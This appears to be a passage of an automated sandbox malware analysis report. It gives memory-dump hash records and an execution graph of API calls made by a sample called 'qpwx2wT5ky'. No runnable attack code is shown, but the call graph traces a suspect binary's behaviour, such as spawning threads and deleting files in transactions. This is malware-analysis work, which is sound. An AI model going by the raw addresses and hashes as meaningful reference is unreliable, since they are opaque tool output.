                    • Instruction Fuzzy Hash: 78715C76F902254BCB04CEB9DD455AFB6E76BCC610759D626E806EF348DA78CD0287C0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 50f6cf8888fd209a490a48dfced26e50ba150caaa1884279452f2181b339ad77
                    • Instruction ID: ba318be25cfda51959f86716a44f02e8f4f04d5ed59858cbdcad000a3491d6b0
                    • Opcode Fuzzy Hash: 50f6cf8888fd209a490a48dfced26e50ba150caaa1884279452f2181b339ad77
                    • Instruction Fuzzy Hash: 60713833F512614FDB08D978DD1A27A72D39BE861075DC166EC1AEB389EA74CE0287C1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 966666fdf667dae8b1f9f381a6404bc9ebc3fb473b42fb844e20e4b81540cf50
                    • Instruction ID: 46204bf136659b8ad8f4ce96faee0ae9356d94e272c8499bf240b5e087236674
                    • Opcode Fuzzy Hash: 966666fdf667dae8b1f9f381a6404bc9ebc3fb473b42fb844e20e4b81540cf50
                    • Instruction Fuzzy Hash: 0F714B7AF902254BCB14CEB9DC451AEB6E7ABCC620755D626E806FF348D978CD0247C0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6737f4ecff328b9daba26fcb8b5bc8a983a27e96adc074f560838fa2fbd485d
                    • Instruction ID: e0c7455bd1f2ad8ab5f2d4569693e182f1278c95a0842ba4f92cba5db736118e
                    • Opcode Fuzzy Hash: e6737f4ecff328b9daba26fcb8b5bc8a983a27e96adc074f560838fa2fbd485d
                    • Instruction Fuzzy Hash: D771173AF902254BCB14CAB9DD455AEA2E76BCC610719D626E816EF748DE78CD0247C0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c3222ab33e0d67337c1b90a950a6423d29ccedbf052c18d6e4c4d4803bace87f
                    • Instruction ID: 768c13081a31c67fbbc11fe3d9a5651aaef9c4a7c4781bd547e8fd17821f80e8
                    • Opcode Fuzzy Hash: c3222ab33e0d67337c1b90a950a6423d29ccedbf052c18d6e4c4d4803bace87f
                    • Instruction Fuzzy Hash: 8471367AF902254BCB14CAB9DD452AEA1E75BCC610719D626E816EF748ED78CD0247C0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 41fb9b8c93b40ba941bd2b1c5c61e3b8d5fec043fc81078bcf01267956abe7b1
                    • Instruction ID: a4730b398dd5f15aa6a2348b2791a42a9f7cc9e7e700fa793c3caa43f6559676
                    • Opcode Fuzzy Hash: 41fb9b8c93b40ba941bd2b1c5c61e3b8d5fec043fc81078bcf01267956abe7b1
                    • Instruction Fuzzy Hash: 3861477AF902354BCB14CAB9DD452AEB2E76BCC620719D626E816EF348DD78CD0247C0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e84447117242b84b323e556694cdf7685f5a72fab6e62f34ea1850f52400e1d0
                    • Instruction ID: a0a23efd46ca255b3e79aa72682b38efb8c0acd1f6c770de3dde9b9f42637ea8
                    • Opcode Fuzzy Hash: e84447117242b84b323e556694cdf7685f5a72fab6e62f34ea1850f52400e1d0
                    • Instruction Fuzzy Hash: 9161377AF902354BCB14CAB9DD451AEA2EB6BCC620719D626E816FF748DD78CD0247C0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e30327e62c5c65d1e7b8d181cb6e4a81efd4e09e15e22c4e59cbffd5d2453eb8
                    • Instruction ID: 3e5a8403f5067410fc912983585e0ea675c8a361cc0b584a4a00e928dcbf00bb
                    • Opcode Fuzzy Hash: e30327e62c5c65d1e7b8d181cb6e4a81efd4e09e15e22c4e59cbffd5d2453eb8
                    • Instruction Fuzzy Hash: 7161257AF902354BCB14CAB9DD451AEA2EB6BCC620719D626E816FF748DD78CD0247C0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 21bf0fb278bb6e4911420d3e662057f34640973dfcbb1e0c520c516ff13a2439
                    • Instruction ID: fb80a7d67e2e3605473cebeda529b4a34dfd2df6d5b93f46c7a360295a8e2bcb
                    • Opcode Fuzzy Hash: 21bf0fb278bb6e4911420d3e662057f34640973dfcbb1e0c520c516ff13a2439
                    • Instruction Fuzzy Hash: 38510B7AF502388BDB04CEA9CC912AA76F37BCC310B09956BD815FB344DA788C014BD4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f8a5b1c602f77339ca37a13b0d28c33438bc376b35dcc4c89a4ead708ebb9b9a
                    • Instruction ID: d39330e97fe658fa0007f268e806d8c149f5165630d2a6a732ba66388ac4ddb6
                    • Opcode Fuzzy Hash: f8a5b1c602f77339ca37a13b0d28c33438bc376b35dcc4c89a4ead708ebb9b9a
                    • Instruction Fuzzy Hash: F551F97AF512388BDB54CEA9CC911AEB6F7BBCC310B05952AD915FB344EA788C014BD4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3376cff626e03f323850d40836554d991349cc7b1e8322a33b768b8e24f29a49
                    • Instruction ID: 0212bf74f3f3643bbaf0c980cdd54f9fdc2cd36404a31246e845e9623eb081c4
                    • Opcode Fuzzy Hash: 3376cff626e03f323850d40836554d991349cc7b1e8322a33b768b8e24f29a49
                    • Instruction Fuzzy Hash: BE51BF71F502148FD748DBA8E8A56ADB6B3FB89304B18912BE50BDB351DB359C128F81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1ef3238938b0e5393011a34ff26f063109b5dd4cf8b155e3e79671ea74eedb85
                    • Instruction ID: 1608684185d79667301b586719d18d2cb72ac485bb72451c301c684f954cd123
                    • Opcode Fuzzy Hash: 1ef3238938b0e5393011a34ff26f063109b5dd4cf8b155e3e79671ea74eedb85
                    • Instruction Fuzzy Hash: 1631F0367002058BDB08DAB9CD1859EB6EBEFC82147569524E61ADF748EF748D028790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:1.7%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:45.7%
                    Total number of Nodes:1922
                    Total number of Limit Nodes:8
                    execution_graph 61300 440e05 61305 441435 SetUnhandledExceptionFilter 61300->61305 61302 440e0a 61306 456df8 25 API calls 2 library calls 61302->61306 61304 440e15 61305->61302 61306->61304 61307 440e17 61308 440e23 ___scrt_is_nonwritable_in_current_image 61307->61308 61335 440b34 61308->61335 61310 440e2a 61311 440f83 61310->61311 61317 440e54 61310->61317 62659 4412d2 4 API calls 2 library calls 61311->62659 61313 440f8a 62660 447797 39 API calls __FrameHandler3::FrameUnwindToState 61313->62660 61315 440f90 62661 44775b 39 API calls __FrameHandler3::FrameUnwindToState 61315->62661 61319 440e73 61317->61319 61323 440e93 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 61317->61323 61343 4554f8 61317->61343 61318 440f98 61321 440ef4 61347 454fc7 61321->61347 61323->61321 62655 447771 44 API calls 4 library calls 61323->62655 61325 440efa 61351 42b39f 61325->61351 61327 440f11 62656 4413f2 GetModuleHandleW 61327->62656 61329 440f1b 61329->61313 61330 440f1f 61329->61330 61331 440f28 61330->61331 62657 44774c 39 API calls __FrameHandler3::FrameUnwindToState 61330->62657 62658 440ca5 78 API calls ___scrt_uninitialize_crt 61331->62658 61334 440f31 61334->61319 61336 440b3d 61335->61336 62662 4410f5 IsProcessorFeaturePresent 61336->62662 61338 440b49 62663 443adb 10 API calls 2 library calls 61338->62663 61340 440b4e 61341 440b52 61340->61341 62664 443afa 7 API calls 2 library calls 61340->62664 61341->61310 61344 45551c 61343->61344 61345 455538 61343->61345 61344->61345 62665 409659 61344->62665 61345->61323 61348 454fd0 61347->61348 61349 454fd5 61347->61349 62750 454b22 61348->62750 61349->61325 61352 42b3a9 __EH_prolog __wsopen_s 61351->61352 61353 42b3b4 CoInitialize 61352->61353 62797 442510 61353->62797 61356 43286f 63381 447797 39 API calls __FrameHandler3::FrameUnwindToState 61356->63381 61358 432875 63382 414495 27 API calls 61358->63382 61361 42b5d0 61362 42b414 61361->61362 61363 42b600 61361->61363 61362->61356 61362->61361 61363->61356 61364 42b6b8 61363->61364 62799 43656b 61364->62799 61367 432852 CoUninitialize 61367->61327 61370 42b6d3 62817 4135ea 61370->62817 61371 42b6ce 62970 439308 56 API calls 3 library calls 61371->62970 61375 4135ea 27 API calls 61376 42b6f6 61375->61376 61377 4135ea 27 API calls 61376->61377 61378 42b70a 61377->61378 62820 41a85d 61378->62820 61380 42b75b 61381 41a85d 44 API calls 61380->61381 61382 42b7bf 61381->61382 61383 41a85d 44 API calls 61382->61383 61384 42b823 61383->61384 62826 415c44 61384->62826 61387 4135ea 27 API calls 61388 42b8e0 61387->61388 62833 413644 61388->62833 61392 42b90c 61393 415c44 44 API calls 61392->61393 61394 42b937 61393->61394 61395 4135ea 27 API calls 61394->61395 61396 42b94f 61395->61396 61397 413644 27 API calls 61396->61397 61398 42b964 61397->61398 61399 416047 49 API calls 61398->61399 61400 42b976 61399->61400 61401 4135ea 27 API calls 61400->61401 61402 42b9a7 61401->61402 61422 42b9fd 61402->61422 62971 43913e 27 API calls __EH_prolog 61402->62971 61404 42b9db 61405 42b9f2 61404->61405 62972 41a76b 25 API calls 61404->62972 62973 41a6fa 25 API calls _Deallocate 61405->62973 61408 42bcf4 61411 42bd11 61408->61411 62976 41402b 27 API calls 61408->62976 61410 4135ea 27 API calls 61410->61422 62915 435c2d 61411->62915 61419 414005 25 API calls 61445 42bda1 61419->61445 61420 42bace Sleep 61420->61422 61421 42bb6a 62974 435d20 27 API calls __EH_prolog 61421->62974 61422->61358 61422->61408 61422->61410 61422->61420 61422->61421 61424 42bb1d Sleep 61422->61424 61425 42bbac 61422->61425 61427 415c44 44 API calls 61422->61427 61429 413644 27 API calls 61422->61429 61431 416047 49 API calls 61422->61431 61434 42bcca 61422->61434 61444 414005 25 API calls 61422->61444 62850 413349 61422->62850 62853 4344fe 61422->62853 62911 413e27 61422->62911 62975 414178 25 API calls 61422->62975 61424->61422 61425->61358 61425->61422 61426 435c2d 27 API calls 61426->61445 61427->61422 61428 4135ea 27 API calls 61428->61445 61429->61422 61430 416047 49 API calls 61430->61445 61431->61422 61435 414005 25 API calls 61434->61435 61436 42bccf 61435->61436 61438 414005 25 API calls 61436->61438 61437 413349 27 API calls 61437->61445 61440 42bcda 61438->61440 61439 4344fe 60 API calls 61439->61445 61441 414005 25 API calls 61440->61441 61443 42bce5 61441->61443 61442 413e27 25 API calls 61442->61445 61446 414005 25 API calls 61443->61446 61444->61422 61445->61419 61445->61426 61445->61428 61445->61430 61445->61437 61445->61439 61445->61442 61447 42bf33 Sleep 61445->61447 61448 42bf5d 61445->61448 62942 415e06 61445->62942 61446->61408 61449 414005 25 API calls 61447->61449 61450 4135ea 27 API calls 61448->61450 61451 42bf49 61449->61451 61452 42bf71 61450->61452 61451->61411 61453 414005 25 API calls 61451->61453 61454 415c44 44 API calls 61452->61454 61453->61451 61455 42bf85 61454->61455 61456 416047 49 API calls 61455->61456 61457 42bf99 61456->61457 61458 42bfa3 61457->61458 61459 42bfaf 61457->61459 62977 414178 25 API calls 61458->62977 62948 414005 61459->62948 61463 42bfd0 61463->61463 61464 42bffe 61463->61464 61479 4327ce 61464->61479 62952 424131 61464->62952 61468 42c035 61471 42c04b _strlen 61468->61471 62978 40af5f 25 API calls 61468->62978 61472 42c07f 61471->61472 62630 4327a5 61471->62630 62979 4360ce 28 API calls 61472->62979 61474 42c084 62980 41abbf 45 API calls 61474->62980 61476 42c0a1 62981 41b627 56 API calls ___std_fs_set_current_path@4 61476->62981 61478 42c0b1 61480 413e27 25 API calls 61478->61480 61479->61367 61481 42c0c0 61480->61481 62982 43f3a9 30 API calls 61481->62982 61483 42c0c5 62983 435b43 46 API calls 61483->62983 61485 42c0ca 62984 432c66 84 API calls 61485->62984 61487 42c0f2 61488 42c2a1 61487->61488 62985 432c66 84 API calls 61487->62985 62994 432c66 84 API calls 61488->62994 61491 42c4ea CreateThread CreateThread CreateThread CreateThread 61492 42c54b 61491->61492 63008 432c66 84 API calls 61492->63008 61493 432c66 84 API calls 61557 42c109 61493->61557 61495 42c55d 63009 432ca5 84 API calls __EH_prolog 61495->63009 61497 413644 27 API calls 61541 42c2c2 61497->61541 61498 42c565 63010 432c66 84 API calls 61498->63010 61501 432c66 84 API calls 61501->61541 61502 42c56d 63011 433097 27 API calls 2 library calls 61502->63011 61503 432ca5 84 API calls 61503->61557 61507 42c579 63012 432c66 84 API calls 61507->63012 61510 42c582 63013 432ca5 84 API calls __EH_prolog 61510->63013 61512 42c16d 62986 432c66 84 API calls 61512->62986 61513 42c58d 63014 432c66 84 API calls 61513->63014 61517 42c595 63015 433097 27 API calls 2 library calls 61517->63015 61519 42c180 62987 432ca5 84 API calls __EH_prolog 61519->62987 61522 42c5a1 63016 432c66 84 API calls 61522->63016 61526 42c5ae 63017 432ca5 84 API calls __EH_prolog 61526->63017 61528 42c5b7 63018 432c66 84 API calls 61528->63018 61529 414005 25 API calls 61529->61541 61531 42c5bf 63019 433097 27 API calls 2 library calls 61531->63019 61534 42c5cb 63020 432c66 84 API calls 61534->63020 61535 4390c6 29 API calls 61535->61541 61539 414005 25 API calls 61539->61557 61540 42c5e7 63021 432ca5 84 API calls __EH_prolog 61540->63021 61541->61491 61541->61497 61541->61501 61541->61529 61541->61535 61545 42c3fd StrToIntA 61541->61545 61552 413e27 25 API calls 61541->61552 61553 413feb 25 API calls 61541->61553 61556 413328 25 API calls 61541->61556 62995 432ca5 84 API calls __EH_prolog 61541->62995 62996 428625 27 API calls 2 library calls 61541->62996 62997 43913e 27 API calls __EH_prolog 61541->62997 62998 41a76b 25 API calls 61541->62998 62999 41a6fa 25 API calls _Deallocate 61541->62999 63006 432c3d 27 API calls 61541->63006 63007 41acc5 25 API calls 61541->63007 61544 42c5ef 63022 432c66 84 API calls 61544->63022 63000 4390c6 61545->63000 61548 42c5f7 63023 4330a0 27 API calls 61548->63023 61550 42c605 61551 4390c6 29 API calls 61550->61551 61554 42c61a 61551->61554 61552->61541 61553->61541 63024 413328 25 API calls 61554->63024 61556->61541 61557->61488 61557->61493 61557->61503 61557->61512 61557->61539 62988 428625 27 API calls 2 library calls 61557->62988 62989 414178 25 API calls 61557->62989 62990 432db9 27 API calls 61557->62990 62991 432bb6 27 API calls 61557->62991 62992 432b2e 27 API calls 61557->62992 62993 41a501 25 API calls 61557->62993 61558 42c626 63025 432c66 84 API calls 61558->63025 61560 42c64d 63026 432ca5 84 API calls __EH_prolog 61560->63026 61562 42c655 63027 432c66 84 API calls 61562->63027 61564 42c65d 63028 4330a0 27 API calls 61564->63028 61566 42c66b 61567 4390c6 29 API calls 61566->61567 61569 42c680 61567->61569 63029 413328 25 API calls 61569->63029 61571 42c68c 63030 432c66 84 API calls 61571->63030 61573 42c6b3 63031 432ca5 84 API calls __EH_prolog 61573->63031 61575 42c6bc 63032 432c66 84 API calls 61575->63032 61577 42c6c4 63033 4330a0 27 API calls 61577->63033 61579 42c6d2 61580 4390c6 29 API calls 61579->61580 61581 42c6e7 61580->61581 63034 413328 25 API calls 61581->63034 61583 42c6f3 63035 432c66 84 API calls 61583->63035 61585 42c763 63038 432c66 84 API calls 61585->63038 61586 42c724 61586->61585 63036 432c66 84 API calls 61586->63036 61589 42c738 63037 4330b2 27 API calls 61589->63037 61591 42c73f 61591->61585 61592 42c749 CreateThread 61591->61592 61592->61585 61593 42c776 61594 42c7ae 61593->61594 63039 432c66 84 API calls 61593->63039 63041 432c66 84 API calls 61594->63041 61596 42c78e 63040 4330b2 27 API calls 61596->63040 61599 42c795 61599->61594 61600 42c799 CreateThread 61599->61600 61600->61594 61601 42c95f 63049 432c66 84 API calls 61601->63049 61604 42cacb 63056 432c66 84 API calls 61604->63056 61605 413644 27 API calls 61668 42c7cd 61605->61668 61607 432c66 84 API calls 61607->61668 61609 413644 27 API calls 61687 42c96f 61609->61687 61610 42cca6 63065 432c66 84 API calls 61610->63065 61612 42ccb4 61617 42ccc3 61612->61617 61618 42ce75 CreateThread 61612->61618 61615 413644 27 API calls 61729 42caea 61615->61729 63066 4360ce 28 API calls 61617->63066 61620 42ce94 61618->61620 61621 42ce8b WaitForSingleObject 61618->61621 61619 432c66 84 API calls 61619->61687 63079 432c66 84 API calls 61620->63079 61621->61620 61622 432c66 84 API calls 61622->61729 61628 42ccd4 61631 435c2d 27 API calls 61628->61631 61629 42ceb5 61635 42d03e 61629->61635 61694 42cec4 61629->61694 61738 432c66 84 API calls 61629->61738 63083 41a55e 25 API calls 61629->63083 63085 432ca5 84 API calls __EH_prolog 61629->63085 63086 4241f1 27 API calls 2 library calls 61629->63086 63087 41a526 27 API calls 61629->63087 61632 42ccdd 61631->61632 61634 4135ea 27 API calls 61632->61634 61637 42cce9 61634->61637 63088 4360ce 28 API calls 61635->63088 63067 432c66 84 API calls 61637->63067 61639 432c66 84 API calls 61639->61694 61641 42ccf6 63068 4241f1 27 API calls 2 library calls 61641->63068 61644 42d055 61647 435c2d 27 API calls 61644->61647 61645 432ca5 84 API calls 61645->61694 61648 42d05e 61647->61648 63089 41a8ad 45 API calls 61648->63089 61649 42cd04 61653 435c2d 27 API calls 61649->61653 61651 42d077 63090 40c8ef 63 API calls 61651->63090 61652 4241f1 27 API calls 61652->61694 61655 42cd25 61653->61655 61658 4135ea 27 API calls 61655->61658 61661 42cd31 61658->61661 63069 434908 62 API calls 2 library calls 61661->63069 61663 42d1d8 63102 432c66 84 API calls 61663->63102 61664 42d086 61664->61663 63091 4360ce 28 API calls 61664->63091 61665 41359c 27 API calls 61665->61668 61668->61601 61668->61605 61668->61607 61668->61665 63042 43299a 27 API calls __EH_prolog 61668->63042 63043 432ca5 84 API calls __EH_prolog 61668->63043 63044 4241f1 27 API calls 2 library calls 61668->63044 63045 43913e 27 API calls __EH_prolog 61668->63045 63046 41a55e 25 API calls 61668->63046 63047 432beb 27 API calls 61668->63047 63048 4159e5 25 API calls 61668->63048 61670 42c976 61670->61604 61670->61687 61671 41359c 27 API calls 61671->61687 61672 42d0b0 61674 435c2d 27 API calls 61672->61674 61678 42d0b9 61674->61678 61675 42d1eb 61696 42d20a 61675->61696 63103 432c66 84 API calls 61675->63103 61676 413644 27 API calls 61676->61694 61677 42cbb6 StrToIntA 61677->61729 63092 41a8ad 45 API calls 61678->63092 61681 42cd46 63070 4360ce 28 API calls 61681->63070 61683 42d203 63104 4330b2 27 API calls 61683->63104 61684 42cadb 61684->61610 61684->61729 63063 415a00 25 API calls 61684->63063 63064 432c66 84 API calls 61684->63064 61685 42d0d3 63093 40c5a5 57 API calls __EH_prolog 61685->63093 61687->61609 61687->61619 61687->61670 61687->61671 63050 432ca5 84 API calls __EH_prolog 61687->63050 63051 4241f1 27 API calls 2 library calls 61687->63051 63052 43913e 27 API calls __EH_prolog 61687->63052 63053 41a55e 25 API calls 61687->63053 63054 432beb 27 API calls 61687->63054 63055 4159e5 25 API calls 61687->63055 61691 42cd7c 61693 435c2d 27 API calls 61691->61693 61692 4390c6 29 API calls 61692->61729 61695 42cd85 61693->61695 61694->61639 61694->61645 61694->61652 61694->61676 63080 414bf6 46 API calls 61694->63080 63081 42aa34 74 API calls 61694->63081 63082 43913e 27 API calls __EH_prolog 61694->63082 63084 432c66 84 API calls 61694->63084 61698 4135ea 27 API calls 61695->61698 61700 42d258 61696->61700 61701 42cd91 61698->61701 61708 42d263 61700->61708 63071 4149e7 45 API calls 61701->63071 61703 42d0e9 63094 40c648 25 API calls 61703->63094 61705 42cda8 63072 4165a8 63 API calls 61705->63072 61708->61696 61711 42d281 61708->61711 61709 42cdb7 61710 42ce66 61709->61710 63073 4149e7 45 API calls 61709->63073 61710->61618 61713 4135ea 27 API calls 61711->61713 61716 42d28d 61713->61716 61714 42cde5 63074 416564 63 API calls 61714->63074 61715 42d1b3 63099 40af5f 25 API calls 61715->63099 63105 432c66 84 API calls 61716->63105 61720 42d1be 63100 40af5f 25 API calls 61720->63100 61721 42d2a0 61723 42d2a7 61721->61723 61727 42d305 61723->61727 61728 42d2ab 61723->61728 61724 41359c 27 API calls 61724->61729 61725 42d1c9 63101 40af5f 25 API calls 61725->63101 61736 42d319 61727->61736 63106 432c66 84 API calls 61728->63106 61729->61615 61729->61622 61729->61677 61729->61684 61729->61692 61729->61724 63057 432ca5 84 API calls __EH_prolog 61729->63057 63058 4241f1 27 API calls 2 library calls 61729->63058 63059 43913e 27 API calls __EH_prolog 61729->63059 63060 41a55e 25 API calls 61729->63060 63061 413328 25 API calls 61729->63061 63062 432c14 27 API calls 61729->63062 61730 42cdf4 61730->61710 63075 432c66 84 API calls 61730->63075 61743 42d32c 61736->61743 61737 42d2ba 63107 4241f1 27 API calls 2 library calls 61737->63107 61738->61629 61742 42d128 61742->61715 63095 4165a8 63 API calls 61742->63095 63096 40ba2d 55 API calls 61742->63096 63097 40c9fc CreateTransaction DeleteFileTransactedA CommitTransaction RollbackTransaction 61742->63097 63098 40c5f2 29 API calls 61742->63098 61747 42d33f 61743->61747 61744 42d2c8 61748 42d2d3 61744->61748 63108 412739 61747->63108 61756 42d2e0 61748->61756 61752 42ce28 61753 42ce47 61752->61753 63076 432c66 84 API calls 61752->63076 63078 411675 213 API calls 3 library calls 61753->63078 61755 42d352 61761 42d360 61755->61761 61759 435c2d 27 API calls 61756->61759 61757 42ce40 63077 4330b2 27 API calls 61757->63077 61768 42d2e9 61759->61768 61763 42d37b 61761->61763 61762 42d2f5 61764 42d300 61762->61764 61765 42d389 61763->61765 61766 42d3b9 CreateThread CreateThread CreateThread 61764->61766 61765->61761 61765->61768 61767 42d3fd 61766->61767 61769 42d40f 61767->61769 61768->61762 61770 42d41c 61769->61770 61771 42d424 61770->61771 61772 42d42d 61771->61772 63109 412739 61772->63109 61774 42d439 63110 41274a 61774->63110 61776 42d444 61776->61771 61777 42d44c 61776->61777 63111 41274a 61777->63111 61779 42d456 63112 412747 61779->63112 61781 42d461 63113 424165 84 API calls __EH_prolog 61781->63113 61783 42d46a 63114 422590 61783->63114 61785 42d471 61786 42d50a 61785->61786 61787 42d479 61785->61787 63121 41359c 61786->63121 61789 42d487 61787->61789 61791 42d494 61789->61791 61790 42d51a 63125 432c66 84 API calls 61790->63125 61794 42d49d 61791->61794 61793 42d528 63126 412739 61793->63126 61797 42d4a6 61794->61797 61796 42d53f 63127 412739 61796->63127 61800 42d4b2 61797->61800 61799 42d552 63128 412739 61799->63128 63115 41274a 61800->63115 61803 42d4bd 61803->61794 61805 42d4c5 61803->61805 61804 42d578 61808 42d59e 61804->61808 63116 41274a 61805->63116 61807 42d4cf 63117 412747 61807->63117 63129 412739 61808->63129 61810 42d4da 63118 424165 84 API calls __EH_prolog 61810->63118 61813 42d4e3 63119 4241f1 27 API calls 2 library calls 61813->63119 61815 42d4f1 63120 4135c9 25 API calls 61815->63120 61817 42d5b1 61819 42d5e9 61817->61819 61818 42d4fd 61818->61790 61819->61817 61820 42d5f1 61819->61820 61821 42d5fe 61820->61821 63130 412747 61821->63130 61823 42d60c 63131 424165 84 API calls __EH_prolog 61823->63131 61825 42d615 61826 42d743 61825->61826 61827 42d624 61825->61827 61828 41359c 27 API calls 61826->61828 63132 432c66 84 API calls 61827->63132 61865 42d736 61828->61865 61830 42d62d 63133 412739 61830->63133 61833 42d75c 61837 42d773 61833->61837 61834 42d644 63134 412739 61834->63134 61836 42d657 61838 42d66a 61836->61838 61839 42d799 61837->61839 61841 42d692 61838->61841 61840 42d7ac 61839->61840 61842 42d7bf 61840->61842 61843 42d6b8 61841->61843 61844 42d7da 61842->61844 61845 42d6c7 61843->61845 61846 42d7e9 61844->61846 61848 42d6f8 61845->61848 61846->61842 61847 42d7ff 61846->61847 61849 42d80c 61847->61849 61850 42d705 61848->61850 63139 424165 84 API calls __EH_prolog 61849->63139 61852 42d713 61850->61852 63135 424165 84 API calls __EH_prolog 61852->63135 61853 42d823 61857 42d832 61853->61857 61858 42d929 61853->61858 61855 42d71c 63136 4241f1 27 API calls 2 library calls 61855->63136 63140 432c66 84 API calls 61857->63140 61859 41359c 27 API calls 61858->61859 61887 42d91c 61859->61887 61860 42d72a 63137 4135c9 25 API calls 61860->63137 61862 42d83b 61866 42d852 61862->61866 63138 432c66 84 API calls 61865->63138 61868 42d865 61866->61868 61867 42d942 61876 42d959 61867->61876 61869 42d88b 61868->61869 61870 42d89e 61869->61870 61871 42d8b9 61870->61871 61872 42d8c8 61871->61872 61873 42d8d6 61872->61873 61873->61870 61874 42d8eb 61873->61874 61875 42d8f9 61874->61875 63141 424165 84 API calls __EH_prolog 61875->63141 63145 424165 84 API calls __EH_prolog 61876->63145 61879 42d902 63142 4241f1 27 API calls 2 library calls 61879->63142 61880 42d9f9 61882 42da00 61880->61882 61885 42daf5 61882->61885 61886 42da0d 61882->61886 61883 42d910 63143 4135c9 25 API calls 61883->63143 61888 41359c 27 API calls 61885->61888 63146 432c66 84 API calls 61886->63146 63144 432c66 84 API calls 61887->63144 61890 42db05 61888->61890 63150 432c66 84 API calls 61890->63150 61891 42da16 61893 42da2d 61891->61893 61920 42da40 61893->61920 61894 42db0e 63151 432c66 84 API calls 61894->63151 61896 42db1a 61897 42db21 61896->61897 61898 42db25 61897->61898 61899 42db9b 61897->61899 63152 432c66 84 API calls 61898->63152 61900 41359c 27 API calls 61899->61900 61902 42db69 61900->61902 63157 432c66 84 API calls 61902->63157 61903 42db32 63153 432c66 84 API calls 61903->63153 61906 42dbb4 63158 432c66 84 API calls 61906->63158 61907 42db3e 63154 4330b2 27 API calls 61907->63154 61910 42dbc0 61914 42dbcb 61910->61914 61915 42dc0e 61910->61915 61911 42db45 63155 41b5d5 27 API calls 61911->63155 61913 42db52 63156 4135c9 25 API calls 61913->63156 63159 432c66 84 API calls 61914->63159 61917 41359c 27 API calls 61915->61917 61941 42dc01 61917->61941 61919 42db5e 61919->61902 63147 424165 84 API calls __EH_prolog 61920->63147 61921 42dbd4 63160 432c66 84 API calls 61921->63160 61924 42dc27 63165 432c66 84 API calls 61924->63165 61925 42dbe0 63161 4330c3 27 API calls 61925->63161 61929 42dbe7 63162 42af9d 48 API calls swprintf 61929->63162 61930 42dac9 63148 4241f1 